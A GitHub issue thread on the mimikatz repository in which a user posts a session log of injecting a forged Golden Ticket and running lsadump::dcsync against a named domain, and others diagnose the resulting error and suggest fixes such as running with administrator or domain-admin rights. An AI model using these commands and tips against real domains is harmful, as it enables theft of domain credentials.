gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

lsadump::dcsync get error #219

Open Anton19780301 opened 5 years ago

Anton19780301 commented 5 years ago

Good evening. I received a Golden Ticket and saved it to a file. No errors occurred. It binds to the user, but when I run the lsadump::dcsync command I get an error: ERROR kuhl_m_lsadump_dcsync; GetNCChanges: 0x000020f7 (8439). I cannot find its meaning. This is a log:

Using 'mylog.txt' for logfile : OK

mimikatz # kerberos::ptt myfile

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 26.07.2019 11:54:13 ; 23.07.2029 11:54:13 ; 23.07.2029 11:54:13
   Server Name : krbtgt/regions.ru @ regions.ru
   Client Name : 9952-00-505 @ regions.ru
   Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;

mimikatz # lsadump::dcsync /domain:regions.ru /user:9952-00-505
[DC] 'regions.ru' will be the domain
[DC] 'r9952-dc02.regions.ru' will be the DC server
[DC] '9952-00-505' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # exit
Bye!

Anton19780301 commented 5 years ago

I'm sorry that means -

ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

MichaelGrafnetter commented 4 years ago

The meaning of this error is "The DN specified for this replication operation is invalid." (ERROR_DS_DRA_BAD_DN). Maybe this will help you, @Anton19780301, with some troubleshooting.

MrDataCoder commented 3 years ago

> I'm sorry that means -
>
> ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

I think some kind of IPS/IDS is detecting it and blocking the DCSync action.

ha3kha3k commented 3 years ago

@Anton19780301 Another simple reason: maybe the PS shell that you initiated the attack from isn't running as local administrator.

Cong-Ma commented 2 years ago

Using a domain manager account and running cmd with an admin account can solve the problem.